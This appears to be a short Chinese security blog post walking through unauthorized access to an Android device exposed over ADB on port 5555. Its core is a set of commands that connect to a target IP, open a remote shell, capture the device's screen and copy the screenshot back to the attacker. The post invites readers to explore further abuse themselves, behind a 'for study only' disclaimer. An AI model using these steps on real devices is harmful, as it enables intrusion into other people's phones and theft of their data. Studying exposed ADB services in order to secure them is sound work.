记一次安卓未授权访问复现

  • A+
所属分类:移动安全

一.前言

这里利用Android 调试桥 (adb) 是一种功能多样的命令行工具,可让您与设备进行通信。adb 命令可用于执行各种设备操作(例如安装和调试应用),并提供对 Unix shell(可用来在设备上运行各种命令)的访问权限。

二.复现

我们拿到一个目标地址后命令行连接上去

记一次安卓未授权访问复现

adb.exe connect ip:5555 #连接目标adb.exe shell #进入设备命令终端adb.exe shell screencap /sdcard/1.png #截图adb.exe pull /sdcard/1.png #下载到本地

记一次安卓未授权访问复现

截图并下载到本地

记一次安卓未授权访问复现

执行系统命令

记一次安卓未授权访问复现

到这里就差不多了,至于玩法大家自行研究一下。



特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。


作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考


本文始发于微信公众号(F12sec):记一次安卓未授权访问复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: